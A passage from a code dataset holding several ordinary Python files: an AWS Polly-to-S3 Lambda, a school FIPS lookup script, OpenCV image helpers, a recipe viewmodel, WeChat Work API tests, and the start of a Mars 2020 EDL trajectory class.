Text=textBlock,\n VoiceId=voice\n )\n\n # Save the audio stream returned by Amazon Polly on Lambda's temp\n # directory. If there are multiple text blocks, the audio stream\n # will be combined into a single file.\n if \"AudioStream\" in response:\n with closing(response[\"AudioStream\"]) as stream:\n output = os.path.join(\"/tmp/\", postId)\n with open(output, \"a\") as file:\n file.write(stream.read())\n\n s3 = boto3.client('s3')\n s3.upload_file('/tmp/' + postId,\n os.environ['BUCKET_NAME'],\n postId + \".mp3\")\n s3.put_object_acl(ACL='public-read',\n Bucket=os.environ['BUCKET_NAME'],\n Key=postId + \".mp3\")\n\n location = s3.get_bucket_location(Bucket=os.environ['BUCKET_NAME'])\n region = location['LocationConstraint']\n\n url = \"https://s3%(region)s.amazonaws.com/%(bucket_name)s/%(postId)s.mp3\" % {\n \"region\": \"-%s\" % str(region) if region else \"\",\n \"bucket_name\": os.environ['BUCKET_NAME'],\n \"postId\": str(postId)\n }\n\n # Updating the item in DynamoDB\n response = table.update_item(\n Key={'id': postId},\n UpdateExpression=\n \"SET #statusAtt = :statusValue, #urlAtt = :urlValue\",\n ExpressionAttributeValues=\n {':statusValue': 'UPDATED', ':urlValue': url},\n ExpressionAttributeNames=\n {'#statusAtt': 'status', '#urlAtt': 'url'},\n )\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(response)\n }\n return response\n", "repo_name": "gadavivi/polly-serverless", "sub_path": "src/convert_to_video.py", "file_name": "convert_to_video.py", "file_ext": "py", "file_size_in_byte": 2882, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "boto3.resource", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 15, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 40, "usage_type": "call"}, {"api_name": "contextlib.closing", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 57, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 70, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "38974728331", "text": "\"\"\"\nPython script for looking up school FIPS codes\nAuthor: Chris Baudouin, Jr \n\"\"\"\nimport os\nimport requests\n\nSCHOOLS_INPUT_FILE = \"\"\nSCHOOLS_OUTPUT_FILE = \"\"\n\nGC_API_KEY = os.environ.get('GC_API_KEY')\nchecked_schools = {} # Used to remove any possible duplicate schools\nstate_city_fips_cache = {} # Used to reduce number of GC API requests\n\n\nclass APIKeyError(Exception):\n \"\"\"\n Custom Exception to handle non-existent Google Cloud API key\n \"\"\"\n pass\n\n\ndef build_school_csv():\n \"\"\"\n Reads in schools.csv, calculates coordinates and identifies FIPS code\n :return: None\n \"\"\"\n schools_file = open(SCHOOLS_INPUT_FILE, \"r\")\n school_line = schools_file.readline()\n\n if GC_API_KEY is None:\n raise APIKeyError('GC API key not found')\n\n while school_line != \"\":\n school_data = school_line.split(',')\n school = school_data[0].rstrip()\n address = school_data[1].replace(' ', '+').rstrip()\n city = school_data[2].replace(' ', '+').rstrip()\n state = school_data[3].replace(' ', '+').rstrip()\n\n if school == \"name\" \\\n or school == \"None\" \\\n or school == '' \\\n or address == '' \\\n or city == '' \\\n or state == '' \\\n or school in checked_schools:\n school_line = schools_file.readline()\n continue\n\n if state in state_city_fips_cache:\n if city in state_city_fips_cache[state]:\n write_to_file(school, address, city, state, state_city_fips_cache[state][city])\n print(\"Loading from cache: \" + school)\n continue\n\n print(\"Fetching data for: \" + school)\n address_lookup_endpoint = f'https://maps.googleapis.com/maps/api/geocode/json?' \\\n f'address={address},+{city},+{state}&' \\\n f'key={GC_API_KEY}'\n\n response = requests.get(address_lookup_endpoint).json()\n\n if len(response['results']) == 0 or response['status'] != \"OK\":\n abort(school, address, city, state)\n continue\n\n try:\n location = response['results'][0]['geometry']['location']\n lat = location['lat']\n lng = location['lng']\n\n fips_endpoint = f'https://geo.fcc.gov/api/census/area?lat={lat}&lon={lng}&format=json'\n fips_response = requests.get(fips_endpoint).json()\n\n if len(fips_response['results']) == 0 or len(fips_response['results'][0][\"county_fips\"]) == 0:\n abort(school, address, city, state)\n continue\n\n fips_code = fips_response['results'][0][\"county_fips\"]\n write_to_file(school, address, city, state, fips_code)\n\n except KeyError:\n abort(school, address, city, state)\n continue\n\n school_line = schools_file.readline()\n\n\ndef abort(school, address, city, state):\n \"\"\"\n Called if no FIPS code could be found or if any other error occurred, saves school with FIPS as None\n :param school: School that was attempted\n :param address: Address of school\n :param city: City of school\n :param state: State of school\n :return: None\n \"\"\"\n print(f'Could not find data for {school}')\n write_to_file(school, address, city, state)\n\n\ndef write_to_file(school, address, city, state, fips=None):\n \"\"\"\n Writes school with possible FIPS code to the SCHOOL_OUTPUT_FILE\n :param school: School that was queried\n :param address: Address of school\n :param city: City of school\n :param state: State of school\n :param fips: FIPS code for school, None if not found or error\n :return: None\n \"\"\"\n output_file = open(SCHOOLS_OUTPUT_FILE, \"a\")\n address = address.replace('+', ' ')\n\n if fips is not None:\n output_file.write(school + ',' + address + ',' + city + ',' + state + ',' + fips + '\\n')\n else:\n output_file.write(school + ',' + address + ',' + city + ',' + state + ',' + \"NONE\" + '\\n')\n if state in state_city_fips_cache:\n state_city_fips_cache[state][city] = fips\n else:\n state_city_fips_cache[state] = {}\n state_city_fips_cache[state][city] = fips\n checked_schools[school] = None\n output_file.close()\n\n\nif __name__ == \"__main__\":\n build_school_csv()\n", "repo_name": "cbaudouinjr/school_fips_lookup", "sub_path": "fips.py", "file_name": "fips.py", "file_ext": "py", "file_size_in_byte": 4354, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 62, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "5887343659", "text": "import os\n\nimport cv2\nimport numpy\n\nfrom library.util import check_type\n\n\"\"\"\nThis tool implement from OpenCV. Can you find more options at https://github.com/opencv/opencv\nDrawing: https://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html\n\n* All method still cover (WIDTH, HEIGHT) and pixel format in RGB format.\n\"\"\"\n\nIM_RGB = 0\nIM_BGR = 0\nDEFAULT_QUALITY = 95\n\n\ndef imread(img_path, pixel_format=IM_RGB):\n check_type(\"img_path\", img_path, str)\n\n if not os.path.isfile(img_path):\n raise FileNotFoundError(img_path)\n\n image = cv2.imread(img_path)\n if pixel_format == IM_RGB:\n return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return image\n\n\ndef imwrite(img, img_path: str, quality=DEFAULT_QUALITY, pixel_format=IM_RGB, over_write=False):\n check_type(\"img_path\", img_path, str)\n\n if img_path.rfind(\".jpg\") < 0:\n img_path = img_path + \".jpg\"\n\n if len(img_path) <= 4:\n raise ValueError(\"File's name is empty!\")\n\n if os.path.isfile(img_path) and not over_write:\n raise FileExistsError(img_path)\n\n if pixel_format == IM_RGB:\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n return cv2.imwrite(img_path, img, [cv2.IMWRITE_JPEG_QUALITY, int(quality)])\n\n\ndef imdecode(buf, flag=cv2.IMREAD_COLOR, pix_fmt=IM_RGB):\n \"\"\"\n Decode image\n Adapt convert image pixel color with pix_fmt\n\n Parameters\n ----------\n buf: source\n flag: cv2.flag\n pix_fmt: format of pixel color. Default: RGB\n\n Returns\n -------\n Image in numpy array\n \"\"\"\n check_type(\"buf\", buf, bytes)\n\n buf = numpy.frombuffer(buf, dtype='uint8')\n image = cv2.imdecode(buf, flag)\n if pix_fmt == IM_RGB:\n return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return image\n\n\ndef imencode(image, pix_fmt=IM_RGB, quality=DEFAULT_QUALITY):\n \"\"\"\n Encode image into jpeg codec\n Adapt convert image pixel color with pix_fmt\n\n Parameters\n ----------\n image: source\n pix_fmt: format of pixel color. Default: RGB\n quality: JPEG quality image.\n\n Returns\n -------\n Buffer of image encoded\n \"\"\"\n check_type(\"image\", image, numpy.ndarray)\n\n if pix_fmt == IM_RGB:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n _, buf = cv2.imencode('.jpeg', image, params=[cv2.IMWRITE_JPEG_QUALITY, int(quality)])\n return buf\n\n\ndef resize(image, width=None, height=None, interpolation=None):\n \"\"\"\n This function resize with keep ratio supported.\n Auto downscale or upscale fit with image's height.\n *: width == -1 or height == -1 mean auto scale\n\n Parameters\n ----------\n image: source\n width: resize width\n height: resize height\n interpolation: cv2 interpolation\n\n Returns\n -------\n New image in numpy array\n \"\"\"\n assert isinstance(image, numpy.ndarray)\n\n # check any width or height parameters was filled.\n if (width is None and height is None) \\\n or not ((not width or width > 0) or (not height or height > 0)) \\\n or (width == image.shape[1] and height == image.shape[0]):\n return image\n\n old_h, old_w, _ = image.shape\n if not width or width <= 0:\n width = height / old_h * old_w\n\n if not height or height <= 0:\n height = width / old_w * old_h\n\n if interpolation is not None:\n return cv2.resize(image, (int(width), int(height)), interpolation=interpolation)\n return cv2.resize(image, (int(width), int(height)))\n\n\n__all__ = ['imencode', 'imdecode', 'imread', 'imwrite', 'resize']\n", "repo_name": "vietmoney/face-anti-spoofing", "sub_path": "library/util/image.py", "file_name": "image.py", "file_ext": "py", "file_size_in_byte": 3529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "61", "api": [{"api_name": "library.util.check_type", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 28, "usage_type": "attribute"}, {"api_name": "library.util.check_type", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "library.util.check_type", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 69, "usage_type": "attribute"}, {"api_name": "library.util.check_type", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 88, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 91, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 93, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 114, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "34272282907", "text": "from typing import List\nfrom typing import Optional\n\nfrom pyrecipe.app.viewmodels.shared import ViewModelBase\n\n\nclass AddViewModel(ViewModelBase):\n \"\"\"Viewmodel used for the /recipe/add view.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.method = self.request.method\n self.path = self.request.path\n self._files = None\n self.images = []\n\n @property\n def ingredients(self) -> List[\"ingredient\"]:\n \"\"\"Returns all ingredients passed in from user input.\"\"\"\n ingredients = [\n i.strip() for i in self.request.form[\"ingredients\"].split(\"\\n\") if i.strip()\n ]\n return ingredients\n\n @property\n def tags(self) -> List[\"tags\"]:\n \"\"\"Returns all tags passed in from user input.\"\"\"\n tags = [\n t.strip().lower()\n for t in self.request.form[\"tags\"].split(\"\\n\")\n if t.strip()\n ]\n if not tags:\n return []\n return list(set(tags))\n\n @property\n def directions(self) -> List[\"directions\"]:\n \"\"\"Returns all directions passed in from user input.\"\"\"\n directions = [\n d.strip() for d in self.request.form[\"directions\"].split(\"\\n\") if d.strip()\n ]\n return directions\n\n @property\n def notes(self) -> List[\"notes\"]:\n \"\"\"Returns all notes passed in from user input.\"\"\"\n notes = [n.strip() for n in self.request.form[\"notes\"].split(\"\\n\") if n.strip()]\n return notes\n\n @property\n def prep_time(self) -> int:\n prep_time = self.request_dict.prep_time\n if prep_time == \"\":\n return 0\n else:\n return int(prep_time)\n\n @property\n def cook_time(self) -> int:\n cook_time = self.request_dict.cook_time\n if cook_time == \"\":\n return 0\n else:\n return int(cook_time)\n\n @property\n def servings(self) -> str:\n servings = self.request_dict.servings\n if servings == \"\":\n return \"0\"\n else:\n return servings\n\n @property\n def name(self) -> str:\n return self.request_dict.name\n\n @property\n def files(self) -> Optional[str]:\n files = self.request.files.getlist(\"files[]\")\n if files:\n self._files = files\n return self._files\n\n @property\n def recipe_url(self) -> Optional[str]:\n return self.request_dict.recipe_url\n\n", "repo_name": "trp07/PyRecipe", "sub_path": "pyrecipe/app/viewmodels/recipe/add_viewmodel.py", "file_name": "add_viewmodel.py", "file_ext": "py", "file_size_in_byte": 2416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyrecipe.app.viewmodels.shared.ViewModelBase", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "14947043018", "text": "# _*_ coding:utf-8 _*_\n# 作者:Season\n# 时间:2020/8/20 22:26\n# 文件名:test_user.py\n# 开发工具:PyCharm\nimport json\nimport logging\nimport time\n\nimport pystache\nimport requests\nfrom weixin.contact.token import WeiXin\nfrom weixin.contact.user import User\nfrom weixin.contact.utils import Utils\n\n\nclass TestUser:\n depart_id = 1\n\n # 创建成员\n def test_create_user(self, token):\n # data 的类型为,所以传参类型为dict时用json。传参类型为str时用data\n data = {\n \"userid\": Utils.uid(),\n \"name\": Utils.uid(),\n \"mobile\": Utils.uid(),\n \"department\": self.depart_id,\n }\n print(type(data))\n r = User().create(token, dict=data)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # 读取成员\n def test_get_user(self, token):\n r = User.get(token, 1)\n logging.debug(json.dumps(r, indent=2))\n assert r[\"errcode\"] == 0\n\n # 更新成员\n def test_update_user(self, token):\n data = {\n \"userid\": 1,\n \"name\": Utils.uid(),\n \"mobile\": Utils.uid()\n }\n r = User.update(token, data)\n logging.debug(json.dumps(r, indent=2))\n logging.debug(type(r))\n assert r[\"errcode\"] == 0\n\n # 删除成员\n def test_delete_user(self, token):\n userid = 1\n r = User.delete(token, userid)\n logging.debug(json.dumps(r, indent=2))\n assert r[\"errcode\"] == 0\n\n # 批量删除成员\n def test_batchdelete(self, token):\n userlist = {\n \"useridlist\": [\n \"15981728465\",\n \"zhangsan\",\n \"15981837285\"\n ]\n }\n r = User.batchdelete(token, userlist)\n logging.debug(r)\n # 字符串类型转换为字典类型要用eval,不能用dict\n assert r[\"errcode\"] == 0\n\n # 获取部门成员\n def test_userlist(self, token):\n r = User().simplelist(token)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # 使用模板创建成员\n def test_creat_by_real(self, token):\n # parse()返回值类型为str,所以data类型也是str,不是json。\n # 所以传参类型为dict时用json。传参类型为str时用data\n data = Utils().parse(template_path=\"user_create.json\",\n dict=\n {\"name\": \"Season\",\n \"userid\": Utils.uid(),\n \"title\": \"校长\",\n \"email\": Utils.uid() + \"@qq.com\",\n \"mobile\": Utils.uid()\n }\n )\n # 增加编码格式\n data = data.encode(\"UTF-8\")\n r = User().create(token, data=data)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # 模板使用练习\n def test_create_by_template_practice(self):\n # print(pystache.render(\"Hello {{name}} {{#has}} word {{value}} {{/has}}\",\n # {\"name\": \"season\", \"has\": [1, 2, 3], \"value\": \"pilot\"})\n # )\n print(pystache.render(\"Hello {{name}} {{#has}} word {{value}} {{/has}}\",\n {\"name\": \"season\",\n \"has\": [\n {\"value\": \"pilot\"},\n {\"value\": \"p\"},\n {\"value\": \"i\"},\n {\"value\": \"l\"},\n {\"value\": \"o\"},\n ]\n }\n )\n )\n\n # 获取部门成员详情\n def test_userlist_details(self, token):\n department_id = 1\n fetch_child = 0\n r = User.list(token, department_id=department_id, fetch_child=fetch_child)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # 邀请成员\n def test_invite(self, token):\n data = {\n \"user\": [\"15981841772\", \"15981841772\", \"1598102560.458127\"],\n \"party\": [2],\n }\n\n r = User.invite(token, data)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # 获取加入企业二维码\n def test_get_join_qrcode(self, token):\n r = User.qrcode(token)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # 获取企业活跃成员数\n def test_active(self, token):\n data = {\n \"date\": time.strftime(\"%Y-%m-%d\", time.localtime())\n }\n r = User.active(token, data)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n", "repo_name": "SeasonPilot/ApiTest", "sub_path": "weixin/contact/test_user.py", "file_name": "test_user.py", "file_ext": "py", "file_size_in_byte": 4663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "weixin.contact.utils.Utils.uid", "line_number": 24, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 24, "usage_type": "name"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 25, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 25, "usage_type": "name"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 26, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 26, "usage_type": "name"}, {"api_name": "weixin.contact.user.User", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 31, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.get", "line_number": 36, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 36, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 44, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 44, "usage_type": "name"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 45, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 45, "usage_type": "name"}, {"api_name": "weixin.contact.user.User.update", "line_number": 47, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 47, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 49, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.delete", "line_number": 55, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 55, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 56, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 56, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.batchdelete", "line_number": 68, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 68, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 69, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 76, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 83, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 86, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 86, "usage_type": "name"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 88, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 88, "usage_type": "name"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 89, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 89, "usage_type": "name"}, {"api_name": "weixin.contact.user.User", "line_number": 94, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 95, "usage_type": "call"}, {"api_name": "pystache.render", "line_number": 103, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.list", "line_number": 120, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 120, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 121, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.invite", "line_number": 131, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 131, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 132, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.qrcode", "line_number": 137, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 137, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 138, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 144, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 144, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.active", "line_number": 146, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 146, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 147, "usage_type": "call"}]} +{"seq_id": "34680910042", "text": "from edl import CKTrajectory, eventTuple, bodyTuple, SPKLoader, UniformSPKLoader, DAFSPKLoader, et2pdt\nimport numpy as np\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\nfrom kwanmath.vector import vlength, vnormalize, vncross, vcross, rv\nfrom kwanmath.matrix import Mr, Mtrans\nfrom kwanmath.interp import linterp, smooth, tableterp\nfrom kwanmath.geodesy import llr2xyz, aTwoBody, aJ2\nfrom kwanspice.which_kernel import which_kernel, ls_spice\nimport matplotlib.pyplot as plt\nimport spiceypy\nfrom hud import HUD\nfrom picturebox import PictureBox\n\n\nclass M20ReconTrajectory(CKTrajectory):\n def __init__(self):\n self.name=\"m20_recon\"\n # Spacecraft EDL surface trajectory\n edl_spk=\"/mnt/big/home/chrisj/workspace/Data/spice/M20/spk/m2020_edl_v01.bsp\"\n # Spacecraft clock kernel, not used until we have a CK, then must use the one that matches the CK\n edl_sclk=\"/mnt/big/home/chrisj/workspace/Data/spice/M20/sclk/M2020_168_SCLKSCET.00007.tsc\",\n extra_kernels=(\n edl_sclk,\n # Spacecraft frame kernel, must use the one referenced in the CK comments\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/fk/m2020_v04.tf\",\n #Spacecraft structures kernel. This is mostly about where the various mechanisms\n #are. You would think that this would have something to do with skycrane,\n #and the separation between the descent stage and the rover, but that\n #is actually in the edl bsp below.\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/spk/m2020_struct_v01.bsp\",\n\n #Spacecraft cruise trajectory\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/spk/m2020_cruise_od138_v1.bsp\",\n\n # Spacecraft EDL surface trajectory\n edl_spk,\n\n #Spacecraft landing site\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/spk/m2020_ls_ops210303_iau2000_v1.bsp\",\n\n #Cruise pointing (maybe don't need, but we have it, so we can will use it).\n #Follow the recommended order in the comments\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/ck/m2020_cruise_recon_nospin_v1.bc\",\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/ck/m2020_cruise_recon_rawrt_v1.bc\",\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/ck/m2020_cruise_recon_raweng_v1.bc\",\n #EDL pointing\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/ck/m2020_edl_v01.bc\",\n )\n loader=DAFSPKLoader(spk=edl_spk, spice_sc=-168031)\n super().__init__(loader=loader,extra_kernels=extra_kernels,ckobj=\"M2020_ROVER\", dropobjs=None)\n # Trajectory values. Manually figured from plots of acceleration and body rates\n #self.et_ei=666952679.25992 #Actual time of last Spice point before EI (about 4m above, next point is about 3m below)\n self.events={}\n self.events[\"ei\"] =666952679.262727 #Interpolated EI time\n self.events[\"peakheat\"] =666952758.91 #peak heating\n self.events[\"rollrev10\"] =666952761.09 #Start of first roll reversal\n self.events[\"maxg\"] =666952766.306 #Smoothed maximum g, 104.874 m/s**2 (10.694 earth g)\n self.events[\"maxq\"] =666952766.82 #maximum dynamic pressure\n self.events[\"rollrev11\"] =666952772.37 #End of first roll reversal\n self.events[\"rollrev20\"] =666952781.43 #Start of second roll reversal\n self.events[\"rollrev21\"] =666952791.31 #End of second roll reversal\n self.events[\"rollrev30\"] =666952809.43 #Start of third roll reversal\n self.events[\"rollrev31\"] =666952828.10 #End of third roll reversal\n self.events[\"sufr0\"] =666952903.05 #Start of straighten up and fly right (SUFR)\n self.events[\"ebm0\"] =666952908.20 #Start of straighten up and fly right (SUFR)\n dt_ebm0=2.0 #(nominal) Time between EBM jettisons. EBMs were jettisoned in pairs\n\n et_ebm=[self.events[\"ebm0\"]+dt_ebm0*0,self.events[\"ebm0\"]+dt_ebm0*0,\n self.events[\"ebm0\"]+dt_ebm0*1,self.events[\"ebm0\"]+dt_ebm0*1,\n self.events[\"ebm0\"]+dt_ebm0*2,self.events[\"ebm0\"]+dt_ebm0*2]\n for i,et in enumerate(et_ebm):\n self.events[f\"ebm{i}\"]=et\n self.events[\"sufr1\"] =666952917.09 #End of SUFR\n self.events[\"mortar\"] =666952919.895 #Mortar firing\n self.events[\"linestretch\"]=666952920.936 #Line stretch jolt\n self.events[\"chuteinf1\"] =666952921.55 #First chute inflation peak, 49.02 m/s**2 (4.999 earth g)\n self.events[\"chuteinf2\"] =666952922.13 #Second chute inflation peak, 53.67 m/s**2\n self.events[\"heatshield\"] =666952942.527 #Heat shield jettison\n self.events[\"backshell\"] =666953036.562 #Backshell separation\n self.events[\"pdi\"] =666953037.598 #Powered descent initiation\n self.events[\"cvel0\"] =666953068.837 #Constant velocity phase begin, hdot=-32m/s\n self.events[\"cvel1\"] =666953073.077 #Constant velocity phase end\n self.events[\"skycrane\"] =666953078.99 #Skycrane start, hdot=-0.75m/s\n self.events[\"rappel0\"] =666953081.6396100 #Rover rapell begin\n self.events[\"rappel1\"] =666953087.1396100 #Rover rappel end\n #This seems to be the point where the rover actually makes contact with the ground\n self.events[\"contact\"] =666953097.33\n #This seems to be the point where the rover *declares* touchdown.\n self.events[\"land\"] =666953098.82832849025726 # Time of first point in post-landing segment.\n self.events[\"bridle\"] =666953098.828360 #Last point in DIMU segment, assumed bridle cut\n self.events[\"rocker\"] =self.events[\"rappel0\"]+0.7\n #self.events[\"rappel1\"] =self.events[\"rappel0\"]+5.5\n self.events[\"bogie\"] =self.events[\"rappel0\"]+6.0\n #Beginning and end of animation\n self.events[\"anim_et0\"] = self.events[\"land\"] - 420 # Seven minutes of excitement! Entry interface is about 0.43s after this time.\n self.events[\"anim_et1\"] = self.events[\"land\"] + 20 # Make sure we are steady on the ground\n\n #sort the event list\n self.events=dict(sorted(self.events.items(),key=lambda x:x[1]))\n\n\n #loader=UniformSPKLoader(et0=et0,et1=et1,dt=1/24,spice_sc=\"-168\")\n loader_ets=loader.time()\n self.i_step={}\n for k,v in self.events.items():\n try:\n self.i_step[k]=np.min(np.where(v=self.events[\"contact\"])[0]\n #Offset the rover rotating position by the delta\n self.rovsvr[:3,w_before]+=dr1vr\n self.rovsvr[:3,w_after]=r1vr_station\n #Offset the descent stage frozen-frame position by the delta rotated into the frozen frame\n self.svf[:3,:]+=Mtrans(Mr(self.Msrf).transpose((0,2,1)),dr1vr)\n def _flyaway(self,sps=200):\n dt=1/sps\n et0=self.events[\"bridle\"]\n #Figure out what direction to fly the descent stage\n t_Msrf=tableterp(self.ets,self.Msrf)\n t_svr=tableterp(self.ets,Mtrans(self.Msrf,self.svf))\n Mds1sib=spiceypy.sxform(self.ckobj,\"J2000\",et0) #J2000 from body at moment of bridle disconnect\n Mds1sfb=self.Msfi @ Mds1sib #Frozen frame from body\n #Mds1srb=t_Msrf(et0) @ self.Msfi @ Mds1sib #Rotating frame from body\n zhat=np.array([[0], [0], [1]])\n ds1rhatr = vnormalize(self.Msrf[-1,:,:] @ self.svf[:,-1])\n ds1ehatr = vncross( zhat ,ds1rhatr)\n ds1nhatr = vncross(ds1rhatr,ds1ehatr)\n #Mds1rtr=np.hstack((ds1ehatr,ds1nhatr,ds1rhatr)).T\n #Mds1rtb=Mds1rtr @ Mr(Mds1srb) #topocentric from body at descent stage location at 